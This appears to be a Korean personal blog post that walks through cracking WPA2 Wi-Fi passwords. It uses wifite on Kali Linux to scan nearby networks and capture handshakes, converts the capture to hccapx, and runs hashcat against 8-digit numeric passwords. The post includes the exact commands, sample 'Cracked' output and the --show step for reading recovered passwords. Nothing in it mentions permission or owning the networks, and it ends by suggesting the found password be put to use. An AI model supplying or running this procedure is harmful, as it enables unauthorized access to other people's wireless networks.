728x90
반응형
하기 전 준비물 2개
1. ESSID와 ERCR 정보들을 갖고오기 위해 kali linux 사용
- VMWARE 사용하거나
- 갖고있는 노트북 사용
* 단 VMWARE 사용하면 WLAN USB 형식 하나 필요함
2. hashcat 다운로드
https://hashcat.net/files/hashcat-6.2.6.7z
kali linux에서
ip addr
하여 wlan 활성화 되어있는지 파악
비밀번호 찾아낼 와이파이 리스트 scan
sudo wifite --wpa --kill
후
index 번호로 wifi 선택
* WPA Handshake Attack 사용
* 나머지 Attact 들은 Ctrl + C 하여 무시하고 c 로 넘김
파악한 .cap 파일 확인
cd /hs
hccapx 형식으로 변환
/usr/share/hashcat-utils/cap2hccapx.bin handshake_WIFINAME.cap wpa2.hccapx
변환한 파일 설치한 hashcat 폴더 내 복붙
CMD 관리자 권한으로 열어서
hashcat 폴더 내 hashcat.exe 파일 실행해보기
사용할 수 있는 GPU 확인 명령어임
hashcat.exe -I
잘 되는거 확인했으면 아래 받은 hccapx 파일 잘 넣어서 아래 실행
hashcat.exe -m 2500 -a 3 --deprecated-check-disable wpa2.hccapx ?d?d?d?d?d?d?d?d
잘 되면 아래와 같이 뜸
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 2500 (WPA-EAPOL-PBKDF2)
Hash.Target......: wpa2.hccapx
Time.Started.....: Tue Oct 22 18:46:04 2024 (1 min, 57 secs)
Time.Estimated...: Tue Oct 22 18:48:01 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 184.8 kH/s (9.61ms) @ Accel:16 Loops:128 Thr:256 Vec:1
Recovered........: 5/5 (100.00%) Digests (total), 5/5 (100.00%) Digests (new)
Progress.........: 21733376/100000000 (21.73%)
Rejected.........: 0/21733376 (0.00%)
Restore.Point....: 2121728/10000000 (21.22%)
Restore.Sub.#1...: Salt:0 Amplifier:8-9 Iteration:4-9
Candidate.Engine.: Device Generator
Candidates.#1....: 76268710 -> 71916710
Hardware.Mon.#1..: Temp: 62c Fan: 40% Util: 99% Core:1890MHz Mem:5750MHz Bus:16
Started: Tue Oct 22 18:45:46 2024
Stopped: Tue Oct 22 18:48:03 2024
다 되면 아래 명령어 실행해서 찾은 비번으로 잘 활용하면? 됨
hashcat.exe -m 2500 -a 3 --deprecated-check-disable wpa2.hccapx ?d?d?d?d?d?d?d?d --show
sthsthsthsthsthsthsthsthsthsth:wifi_name:비밀번호 나올 칸
sthsthsthsthsthsthsthsthsthsth:wifi_name:비밀번호 나올 칸
728x90
반응형
'개인프로젝트' 카테고리의 다른 글
freqtrade 오픈소스 코드 분석해보기! 비트코인 투자 자동화 오픈소스 프로젝트 (0) | 2024.06.27 |
---|---|
[팁] NODEJS 그리고 AWS S3 버킷생성, 파일 업로드, 파일 다운로드 기능 한번에 구현하기 - 소스코드 포함 (0) | 2024.05.09 |